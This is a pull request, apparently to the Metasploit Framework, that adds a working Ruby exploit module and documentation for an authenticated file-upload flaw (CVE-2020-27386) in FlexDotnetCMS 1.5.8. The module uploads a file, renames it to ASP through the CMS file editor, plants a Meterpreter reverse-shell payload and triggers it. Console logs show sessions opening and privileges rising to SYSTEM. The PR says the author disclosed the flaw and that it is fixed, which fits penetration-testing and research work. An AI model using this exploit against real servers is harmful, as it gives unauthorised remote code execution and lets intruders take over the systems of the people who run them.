### PR TITLE
Add flexdotnetcms v1.5.8 exploit module and docs

### DIFF
--- a/documentation/modules/exploit/windows/http/flexdotnetcms_upload_exec.md
+++ b/documentation/modules/exploit/windows/http/flexdotnetcms_upload_exec.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
-This module exploits an arbitrary file upload vulnerability in FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary commands
-with elevated privileges.
+This module exploits an arbitrary file upload vulnerability (CVE-2020-27386) in FlexDotnetCMS v1.5.8 and prior
+in order to execute arbitrary commands with elevated privileges.
 
 The module first tries to obtain various tokens required for authentication from `/login`.
 Next, the module tries to authenticate via an HTTP POST request to the same destination followed by an HTTP GET request to `/Admin`.

--- a/documentation/modules/exploit/windows/http/flexdotnetcms_upload_exec.md
+++ b/documentation/modules/exploit/windows/http/flexdotnetcms_upload_exec.md
@@ -1,0 +1,140 @@
+## Vulnerable Application
+This module exploits an arbitrary file upload vulnerability in FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary commands
+with elevated privileges.
+
+The module first tries to obtain various tokens required for authentication from `/login`.
+Next, the module tries to authenticate via an HTTP POST request to the same destination followed by an HTTP GET request to `/Admin`.
+If authentication is successful, the module uploads a TXT file containing a random string via an HTTP POST request to
+`/Scripts/tinyfilemanager.net/dialog.aspx`.
+The module then loads the uploaded TXT file in the file editor in order to obtain tokens necessary for renaming the TXT file.
+It then tries to rename the TXT file to an ASP file via an HTTP POST request to `/Admin/Views/PageHandlers/FileEditor/Default.aspx`.
+If this succeeds, the target is vulnerable and the ASP file is generated as a copy of the TXT file, which remains on the server.
+Next, the module sends another request to the file editor to rename the TXT file to an ASP file, this time adding the payload.
+The module will execute the payload via a simple HTTP GET request to `/media/uploads/asp_payload`.
+Finally, the module will try to delete both the uploaded TXT file and the ASP copy from the target.
+
+Valid credentials for a FlexDotnetCMS user with permissions to use the FileManager are required.
+This attack will normally result in remote code execution with administrator privileges, because the attacker will inherit the privileges
+of the IIS/IIS Express process, which must run with elevated privileges if configured to allow remote connections.
+This module has been successfully tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.
+
+Vulnerable software for testing is available on GitHub [here](https://github.com/MacdonaldRobinson/FlexDotnetCMS/releases).
+Detailed installation instructions are available
+[here](https://github.com/MacdonaldRobinson/FlexDotnetCMS/raw/master/WebApplication/Admin/media/docs/FlexDotnetCMSGuide.docx).
+As the instructions mention, FlexDotnetCMS requires the following dependencies:
+- .NET Framework 4.5.2
+- Visual Studio 2015 (Free Community Edition works)
+- MS SQL Server (Express) 2012 +
+- IIS (Express) 8 +
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/FlexDotnetCMS_upload_exec`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the FlexDotnetCMS account]`
+6. Do: `set PASSWORD [password for the FlexDotnetCMS account]`
+7. Do: `set target [target]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the FlexDotnetCMS account to authenticate with.
+### TARGETURI
+The base path to FlexDotnetCMS. The default value is `/`.
+### USERNAME
+The username for the FlexDotnetCMS account to authenticate with. The default value is `admin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Windows (x86)
+1   Windows (x64)
+```
+
+## Scenarios
+### FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x86 target
+```
+msf6 exploit(windows/http/flexdotnetcms_upload_exec) > show options
+
+Module options (exploit/windows/http/flexdotnetcms_upload_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Password1        yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.230    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      1113             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to FlexDotnetCMS
+   USERNAME   admin            yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.128    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows (x86)
+
+
+msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to FlexDotnetCMS
+[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
+[*] Uploaded test file wxoI7s6knq.txt. Attempting to rename the file to wxoI7s6knq.asp...
+[+] Successfully renamed test file wxoI7s6knq.txt to wxoI7s6knq.asp (this is a copy of wxoI7s6knq.txt, which remains on the server)
+[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
+[*] Renaming wxoI7s6knq.txt to wxoI7s6knq.asp again, this time adding the payload
+[+] Successfully added the ASP payload to wxoI7s6knq.asp
+[*] Executing the payload...
+[*] Sending stage (175174 bytes) to 192.168.1.230
+[*] Meterpreter session 9 opened (192.168.1.128:4444 -> 192.168.1.230:62058) at 2020-11-02 11:10:41 -0500
+[+] Successfully deleted wxoI7s6knq.txt
+[+] Successfully deleted wxoI7s6knq.asp
+
+meterpreter > getuid
+Server username: WIN-S623VF4MJDR\Administrator
+meterpreter > getsystem 
+ge...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+tmeterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+### FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x64 target
+```
+msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to FlexDotnetCMS
+[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
+[*] Uploaded test file XLz3OTusi.txt. Attempting to rename the file to XLz3OTusi.asp...
+[+] Successfully renamed test file XLz3OTusi.txt to XLz3OTusi.asp (this is a copy of XLz3OTusi.txt, which remains on the server)
+[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
+[*] Renaming XLz3OTusi.txt to XLz3OTusi.asp again, this time adding the payload
+[+] Successfully added the ASP payload to XLz3OTusi.asp
+[*] Executing the payload...
+[*] Sending stage (200262 bytes) to 192.168.1.230
+[*] Meterpreter session 10 opened (192.168.1.128:4444 -> 192.168.1.230:62059) at 2020-11-02 11:10:55 -0500
+[+] Successfully deleted XLz3OTusi.txt
+[+] Successfully deleted XLz3OTusi.asp
+
+meterpreter > getuid
+Server username: WIN-S623VF4MJDR\Administrator
+meterpreter >
+```

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -105,6 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # used to ensure cleanup only runs against flexdotnetcms targets
+    @skip_cleanup = true
+
     # visit login the page to get the necessary cookies
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'login/'),
@@ -125,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')
     event_validation = html.at('input[@id="__EVENTVALIDATION"]')
     if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
-      return CheckCode::Unknown('Received unexpected response while trying to obtain tokens necessary for authentication from /login')
+      return CheckCode::Detected('Received unexpected response while trying to obtain tokens necessary for authentication from /login')
     end
 
     viewstate_key = viewstate_key['value']
@@ -149,22 +152,22 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      return CheckCode::Unknown('Connection failed')
+      return CheckCode::Detected('Connection failed')
     end
 
     unless res.code == 200 && res.body.include?('pageRedirect||%2fadmin')
-      return CheckCode::Unknown('Failed to authenticate to the server.')
+      return CheckCode::Detected('Failed to authenticate to the server.')
     end
 
     # visit the backend dashboard
     res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'Admin/')
 
     unless res
-      return CheckCode::Unknown('Connection failed')
+      return CheckCode::Detected('Connection failed')
     end
 
     unless res.code == 200 && res.body.include?('Welcome to your site editor:')
-      return CheckCode::Unknown('Received unexpected response while trying to follow redirect to /Admin/')
+      return CheckCode::Detected('Received unexpected response while trying to follow redirect to /Admin/')
     end
 
     print_good('Successfully authenticated to FlexDotnetCMS')
@@ -192,14 +195,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => post_data.to_s
     })
 
+    @skip_cleanup = false # cleanup only has to run if at least one attempt to upload a file has been made
+
     vprint_status("Uploading test file #{@payload_txt}...")
 
     unless res
-      return CheckCode::Unknown("Connection failed while trying to upload test file #{@payload_txt}")
+      return CheckCode::Detected("Connection failed while trying to upload test file #{@payload_txt}")
     end
 
     unless res.code == 200
-      return CheckCode::Unknown("Received unexpected response while trying to upload test file #{@payload_txt}")
+      return CheckCode::Detected("Received unexpected response while trying to upload test file #{@payload_txt}")
     end
 
     # load the test file in the file editor in order to obtain tokens required for renaming it
@@ -210,11 +215,11 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      return CheckCode::Unknown("Connection failed while trying to open test file #{@payload_txt} in the file editor")
+      return CheckCode::Detected("Connection failed while trying to open test file #{@payload_txt} in the file editor")
     end
 
     unless res.code == 200 && res.body.include?('Successfully loaded file')
-      return CheckCode::Unknown("Received unexpected response while trying to open test file #{@payload_txt} in the file editor")
+      return CheckCode::Detected("Received unexpected response while trying to open test file #{@payload_txt} in the file editor")
     end
 
     # FlexDotNetCMS displays the full installation path on the server in response to the previous GET request, so we can print it
@@ -226,11 +231,11 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...")
     res = rename_file(res, rand_text_alpha(10..20))
     if res == 'no_tokens'
-      return CheckCode::Unknown("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
+      return CheckCode::Detected("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
     end
 
     unless res
-      return CheckCode::Unknown("Connection failed while trying to rename the test file #{@payload_txt}.")
+      return CheckCode::Detected("Connection failed while trying to rename the test file #{@payload_txt}.")
     end
 
     unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
@@ -281,6 +286,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cleanup
+    # only run when at least one attempt to updload a file has been made
+    return if @skip_cleanup
+
     # delete uploaded TXT and ASP files
     [@payload_txt, @payload_asp].each do |file|
       res = send_request_cgi({

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -1,0 +1,300 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FlexDotnetCMS Arbitrary ASP File Upload',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability in
+          FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary
+          commands with elevated privileges.
+
+          The module first tries to authenticate to FlexDotnetCMS via an HTTP
+          POST request to `/login`. It then attempts to upload a random TXT
+          file and subsequently uses the FlexDotnetCMS file editor to rename
+          the TXT file to an ASP file. If this succeeds, the target is
+          vulnerable and the ASP file is generated as a copy of the TXT file,
+          which remains on the server.
+
+          Next, the module sends another request to rename the TXT file to an
+          ASP file, this time adding the payload. Finally, the module tries
+          to execute the ASP payload via a simple HTTP GET request to
+          `/media/uploads/asp_payload`
+
+          Valid credentials for a FlexDotnetCMS user with permissions to use
+          the FileManager are required. This module has been successfully
+          tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Erik Wynter' # @wyntererik - Discovery & Metasploit
+          ],
+        'References' =>
+          [
+            ['URL', 'https://github.com/MacdonaldRobinson/FlexDotnetCMS/commit/2873992aa4266502998edb757cc31f3f4867e423'] # commit that fixes the vulnerability
+          ],
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            [
+              'Windows (x86)', {
+                'Arch' => [ARCH_X86],
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Windows (x64)', {
+                'Arch' => [ARCH_X64],
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+        'DefaultTarget' => 0,
+        'Privileged'     => false,
+        'DisclosureDate' => '2020-09-28'
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to FlexDotnetCMS', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+    ]
+  end
+
+  def rename_file(res, payload)
+    # obtain tokens required for renaming the payload
+    html = res.get_html_document
+    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')['value']
+    event_validation = html.at('input[@id="__EVENTVALIDATION"]')['value']
+
+    # rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
+      'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" },
+      'vars_post' => {
+        '__EVENTTARGET' => 'ctl00$ContentPlaceHolder1$Save',
+        '__VIEWSTATEKEY' => viewstate_key,
+        '__EVENTVALIDATION' => event_validation,
+        'ctl00$ContentPlaceHolder1$FileSelector$SelectedFile' => "/media/uploads/#{@payload_asp}",
+        'ctl00$ContentPlaceHolder1$Editor' => payload
+      }
+    })
+  end
+
+  def check
+    # visit login the page to get the necessary cookies
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'login/'),
+      'keep_cookies' => true
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('Login - Home')
+      return CheckCode::Safe('Target is not a FlexDotnetCMS application.')
+    end
+
+    # get cookies and tokens necessary for authentication
+    html = res.get_html_document
+    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')['value']
+    event_validation = html.at('input[@id="__EVENTVALIDATION"]')['value']
+
+    # perform login to verify if the target is a FlexDotnetCMS application
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login/'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton', #ideally the % in this line would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works
+        '__EVENTTARGET' => 'LoginControl$LoginButton',
+        '__VIEWSTATEKEY' => viewstate_key,
+        'LoginControl$Username' => datastore['USERNAME'],
+        'LoginControl$Password' => datastore['PASSWORD'],
+        '__EVENTVALIDATION' => event_validation,
+        '__ASYNCPOST' => 'true'
+      }
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('pageRedirect||%2fadmin')
+      return CheckCode::Unknown('Failed to authenticate to the server.')
+    end
+
+    # visit the backend dashboard
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'Admin/')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('Welcome to your site editor:')
+      return CheckCode::Unknown('Received unexpected response while trying to follow redirect to /Admin/')
+    end
+
+    print_good('Successfully authenticated to FlexDotnetCMS')
+
+    # prepare to upload a TXT file and rename it to an ASP file. If this works, the target is vulnerable.
+    # generate file names and post data
+    @payload_txt = "#{rand_text_alphanumeric(6..10)}.txt"
+    @payload_asp = @payload_txt.split(".txt")[0] << ".asp"
+    boundary_string = rand_text_alphanumeric(16)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('\\media\\uploads\\', nil, nil, 'form-data; name="folder"')
+    post_data.add_part(rand_text_alpha(10..20), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{@payload_txt}\"")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => {
+        'Accept' => 'application/json',
+        'X-Requested-With' => 'XMLHttpRequest',
+        'X-File-Name' => @payload_txt,
+      },
+      'vars_get' => {
+        'cmd' => 'upload'
+      },
+      'data' => post_data.to_s
+    })
+
+    vprint_status("Uploading test file #{@payload_txt}...")
+
+    unless res
+      return CheckCode::Unknown("Connection failed while trying to upload test file #{@payload_txt}")
+    end
+
+    unless res.code == 200
+      return CheckCode::Unknown("Received unexpected response while trying to upload test file #{@payload_txt}")
+    end
+
+    # load the test file in the file editor in order to obtain tokens required for renaming it
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
+      'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }
+    })
+
+    unless res
+      return CheckCode::Unknown("Connection failed while trying to open test file #{@payload_txt} in the file editor")
+    end
+
+    unless res.code == 200 && res.body.include?('Successfully loaded file')
+      return CheckCode::Unknown("Received unexpected response while trying to open test file #{@payload_txt} in the file editor")
+    end
+
+    # FlexDotNetCMS displays the full installation path on the server in response to the previous GET request, so we can print it
+    flexdotnetcms_path = res.body.scan(/jQuery\.jGrowl\(\"Successfully loaded file \( (.*?)WebApplication/).flatten.first
+    unless flexdotnetcms_path.blank?
+      print_status("FlexDotnetCMS is installed on the target at #{flexdotnetcms_path}")
+    end
+
+    print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...")
+    res = rename_file(res, rand_text_alpha(10..20))
+
+    unless res
+      return CheckCode::Unknown("Connection failed while trying to rename the test file #{@payload_txt}.")
+    end
+
+    unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
+      vprint_status("Failed to use the file editor to rename test file #{@payload_txt} to #{@payload_asp}")
+      return CheckCode::Safe("Target is FlexDotnetCMS v1.5.9 or higher")
+    end
+
+    print_good("Successfully renamed test file #{@payload_txt} to #{@payload_asp} (this is a copy of #{@payload_txt}, which remains on the server)")
+
+    return CheckCode::Vulnerable('Target is FlexDotnetCMS v1.5.8 or lower.')
+  end
+
+  def rename_test_file_and_add_payload
+    print_status("Renaming #{@payload_txt} to #{@payload_asp} again, this time adding the payload")
+
+    # load the file in the file editor in order to obtain tokens required for renaming it
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
+      'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, "Connection failed while trying to open #{@payload_txt} in the file editor")
+    end
+
+    unless res.code == 200 && res.body.include?('Successfully loaded file')
+      fail_with(Failure::Unknown, "Received unexpected response while trying to open #{@payload_txt} in the file editor")
+    end
+
+    # genenerate ASP payload, then rename the TXT file again while adding the payload
+    exe = generate_payload_exe
+    payload = Msf::Util::EXE.to_exe_asp(exe).to_s
+    res = rename_file(res, payload)
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to add the ASP payload.')
+    end
+
+    unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
+      fail_with(Failure::Unknown, 'Failed to add the ASP payload.')
+    end
+
+    print_good("Successfully added the ASP payload to #{@payload_asp}")
+  end
+
+  def cleanup
+    # delete uploaded TXT and ASP files
+    [@payload_txt, @payload_asp].each do |file|
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),
+        'vars_get' => {
+          'cmd' => 'delfile',
+          'file' => "\\media\\uploads\\#{file}",
+          'currpath' => '\\media\\uploads\\'
+        }
+      })
+
+      unless res && res.code == 200 && res.body.exclude?(file)
+        print_error("Failed to delete #{file}.")
+        print_warning("Manual cleanup of #{file} is required.")
+        return
+      end
+
+      print_good("Successfully deleted #{file}")
+    end
+  end
+
+  def exploit
+    rename_test_file_and_add_payload
+    print_status('Executing the payload...')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', "#{@payload_asp}")
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::Unknown, 'Received unexpected response while trying to execute the payload')
+    end
+  end
+end

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References' =>
           [
-            ['URL', 'https://github.com/MacdonaldRobinson/FlexDotnetCMS/commit/2873992aa4266502998edb757cc31f3f4867e423'] # commit that fixes the vulnerability
+            ['CVE', '2020-27386'],
           ],
         'Platform' => 'win',
         'Targets' =>

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -80,8 +80,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def rename_file(res, payload)
     # obtain tokens required for renaming the payload
     html = res.get_html_document
-    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')['value']
-    event_validation = html.at('input[@id="__EVENTVALIDATION"]')['value']
+    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')
+    event_validation = html.at('input[@id="__EVENTVALIDATION"]')
+    if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
+      return 'no_tokens'
+    end
+    viewstate_key = viewstate_key['value']
+    event_validation = event_validation['value']
 
     # rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup)
     res = send_request_cgi({
@@ -109,14 +114,20 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Connection failed')
     end
 
-    unless res.code == 200 && res.body.include?('Login - Home')
+    # the login page doesn't contain the name of the app or the author, so we're combining a bunch of checks to limit the odds of failing to flag an incorrect target
+    unless res.code == 200 && res.body.include?('<title>Login - Home</title>') && res.body.include?('<label>Email</label><br>') && res.body.include?('>Forgot my password</a>')
       return CheckCode::Safe('Target is not a FlexDotnetCMS application.')
     end
 
     # get cookies and tokens necessary for authentication
     html = res.get_html_document
-    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')['value']
-    event_validation = html.at('input[@id="__EVENTVALIDATION"]')['value']
+    viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')
+    event_validation = html.at('input[@id="__EVENTVALIDATION"]')
+    if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
+      return CheckCode::Unknown('Received unexpected response while trying to obtain tokens necessary for authentication from /login')
+    end
+    viewstate_key = viewstate_key['value']
+    event_validation = event_validation['value']
 
     # perform login to verify if the target is a FlexDotnetCMS application
     res = send_request_cgi({
@@ -212,6 +223,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...")
     res = rename_file(res, rand_text_alpha(10..20))
+    if res == 'no_tokens'
+      return CheckCode::Unknown("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
+    end
 
     unless res
       return CheckCode::Unknown("Connection failed while trying to rename the test file #{@payload_txt}.")
@@ -242,13 +256,16 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless res.code == 200 && res.body.include?('Successfully loaded file')
-      fail_with(Failure::Unknown, "Received unexpected response while trying to open #{@payload_txt} in the file editor")
+      fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to open #{@payload_txt} in the file editor")
     end
 
     # genenerate ASP payload, then rename the TXT file again while adding the payload
     exe = generate_payload_exe
     payload = Msf::Util::EXE.to_exe_asp(exe).to_s
     res = rename_file(res, payload)
+    if res == 'no_tokens'
+      fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
+    end
 
     unless res
       fail_with(Failure::Disconnected, 'Connection failed while trying to add the ASP payload.')
@@ -294,7 +311,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless res.code == 200
-      fail_with(Failure::Unknown, 'Received unexpected response while trying to execute the payload')
+      fail_with(Failure::UnexpectedReply, 'Received unexpected response while trying to execute the payload')
     end
   end
 end

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ]
           ],
         'DefaultTarget' => 0,
-        'Privileged'     => false,
+        'Privileged' => false,
         'DisclosureDate' => '2020-09-28'
       )
     )
@@ -85,11 +85,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
       return 'no_tokens'
     end
+
     viewstate_key = viewstate_key['value']
     event_validation = event_validation['value']
 
     # rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup)
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
       'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" },
@@ -126,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
       return CheckCode::Unknown('Received unexpected response while trying to obtain tokens necessary for authentication from /login')
     end
+
     viewstate_key = viewstate_key['value']
     event_validation = event_validation['value']
 
@@ -135,7 +137,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'login/'),
       'keep_cookies' => true,
       'vars_post' => {
-        'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton', #ideally the % in this line would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works
+        # ideally the % in the line below would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works
+        'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton',
         '__EVENTTARGET' => 'LoginControl$LoginButton',
         '__VIEWSTATEKEY' => viewstate_key,
         'LoginControl$Username' => datastore['USERNAME'],
@@ -169,8 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # prepare to upload a TXT file and rename it to an ASP file. If this works, the target is vulnerable.
     # generate file names and post data
     @payload_txt = "#{rand_text_alphanumeric(6..10)}.txt"
-    @payload_asp = @payload_txt.split(".txt")[0] << ".asp"
-    boundary_string = rand_text_alphanumeric(16)
+    @payload_asp = @payload_txt.split('.txt')[0] << '.asp'
     post_data = Rex::MIME::Message.new
     post_data.add_part('\\media\\uploads\\', nil, nil, 'form-data; name="folder"')
     post_data.add_part(rand_text_alpha(10..20), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{@payload_txt}\"")
@@ -182,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'Accept' => 'application/json',
         'X-Requested-With' => 'XMLHttpRequest',
-        'X-File-Name' => @payload_txt,
+        'X-File-Name' => @payload_txt
       },
       'vars_get' => {
         'cmd' => 'upload'
@@ -233,7 +235,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
       vprint_status("Failed to use the file editor to rename test file #{@payload_txt} to #{@payload_asp}")
-      return CheckCode::Safe("Target is FlexDotnetCMS v1.5.9 or higher")
+      return CheckCode::Safe('Target is FlexDotnetCMS v1.5.9 or higher')
     end
 
     print_good("Successfully renamed test file #{@payload_txt} to #{@payload_asp} (this is a copy of #{@payload_txt}, which remains on the server)")
@@ -304,7 +306,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     rename_test_file_and_add_payload
     print_status('Executing the payload...')
-    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', "#{@payload_asp}")
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', @payload_asp.to_s)
 
     unless res
       fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload.')


### PR DESCRIPTION
## About 
This change adds a new module to /modules/exploits/windows/http/ that exploits an arbitrary file upload vulnerability in FlexDotnetCMS v1.5.8 (CVE-2020-27386) and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed in v1.5.9.

## Vulnerable system
FlexDotnetCMS v1.5.8 and prior

## Verification Steps
